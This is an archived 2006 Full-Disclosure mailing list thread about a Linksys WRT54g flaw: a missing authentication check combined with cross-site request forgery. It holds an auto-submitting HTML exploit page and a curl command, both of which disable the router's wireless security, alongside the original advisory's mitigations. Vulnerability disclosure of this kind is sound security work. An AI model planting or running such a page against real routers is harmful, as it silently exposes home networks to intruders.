lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list] 
Date: Sat, 4 Nov 2006 11:55:15 +0000
From: pagvac <unknown.pentester@...il.com>
To: full-disclosure@...ts.grok.org.uk
Cc: Ginsu Rabbit <ginsurabbit@...mail.com>
Subject: Re: linksys WRT54g authentication bypass

Sorry I'm replying to this post after so long, but I was bored this
morning and decided to create a specially-crafted HTML page that would
allow me to replicate the unauth CSRF attack described by Ginsu
Rabbit. Very interesting vuln btw :-)

The following is the code for the specially-crafted HTML page.
Unfortunately, I do not have a vulnerable Linksys router to test this,
so I simply strictly followed the structure of the POST request as
described in the advisory. Hopefully it should work.

It'd be cool if someone could test this against a vulnerable model.

Here is an on-line copy:

http://ikwt.com/projects/linksys/BID19347_test.html


<html>

<head><title>BID 19347 specially-crafted html page - vuln found by
Ginsu Rabbit</title></head>

<body>

<form action="http://192.168.0.1/Security.tri" method="POST">
<input type="hidden" name="SecurityMode" value="0">
<input type="hidden" name="layout" value="en">
</form>

<script>document.forms[0].submit();</script>

</body>
</html>

On 8/4/06, Ginsu Rabbit <ginsurabbit@...mail.com> wrote:
> I'm having some trouble believing this hasn't been reported before.  If you
> have a linksys router handy, please check to see whether it is vulnerable to
> this attack.  It's possible that all of the linksys router web UIs have the
> same bug.  Hopefully the problem is isolated to one particular model or
> firmware revision.
>
> I. DESCRIPTION
>
> Tested product: Linksys WRT54g home router, firmware revision 1.00.9.
>
> Problem #1: No password validation for configuration settings.
>
> The WRT54g does not attempt to verify a username and password when
> configuration settings are being changed.  If you wish to read configuration
> settings, you must provide the administrator ID and password via HTTP basic
> authentication.  No similar check is done for configuration changes.
>
> This request results in a user-id and password prompt:
> GET /wireless.htm
>
> This request disables wireless security on the router, with no password
> prompt:
> POST /Security.tri
> Content-Length: 24
>
> SecurityMode=0&layout=en
>
> Problem #2: Cross-site request forgery
>
> The web administration console does not verify that the request to change
> the router configuration is being made with the consent of the
> administrator.  Any web site can force a browser to send a request to the
> linksys router, and the router will accept the request.
>
>
> II. Exploitation
>
> The combination of these two bugs means that any internet web site can
> change the configuration of your router.  Recently published techniques for
> port-scanning and web server finger printing via java and javascript make
> this even easier.  The attack scenario is as follows:
>
> - intranet user visits a malicious web site
> - malicious web site returns specially crafted HTML page
> - intranet user's browser automatically sends a request to the router that
> enables the remote administration interface
> - the owner of the malicious web site now has complete access to your router
>
> I'm not going to share the "specially crafted HTML page" at this time, but
> it isn't all that special.
>
>
> III. DETECTION
>
> If your router is vulnerable, the following curl command will disable
> wireless security on your router.  Tests for other router models and
> firmware revisions may be different:
>
> curl -d "SecurityMode=0&layout=en" http://192.168.0.1/Security.tri
>
>
> IV. MITIGATION
>
> 1) Make sure you've disabled the remote administration feature of your
> router.  If you have this "feature" enabled, anybody on the internet can
> take control of the router.
>
> 2) Change the IP address of the router to a random value, preferably in the
> range assigned to private networks.  For example, change the IP address to
> 10.x.y.z, where x, y, and z are numbers between 0 and 255 inclusive.  This
> makes it more difficult for an attacker to forge the request necessary to
> change the router configuration.  This mitigation technique might not help
> much if you have a java-enabled browser, because of recently published
> techniques for determining gateway addresses via java applets.
>
> 3) Disable HTTP access to the administration interface of the router,
> allowing only HTTPS access.  Under most circumstances, this will cause the
> browser to show a certificate warning before the configuration is changed.
>
> V. VENDOR NOTIFICATION
>
> Linksys customer support was notified on June 24, 2006.
> Full disclosure on August 4, 2006.
>
> --
> GR
>
> _________________________________________________________________
> Is your PC infected? Get a FREE online computer virus scan from McAfee(r)
> Security. http://clinic.mcafee.com/clinic/ibuy/campaign.asp?cid=3963
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>


-- 
pagvac
[http://ikwt.com/]

View attachment "BID19347_test.html" of type "text/html" (357 bytes)

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ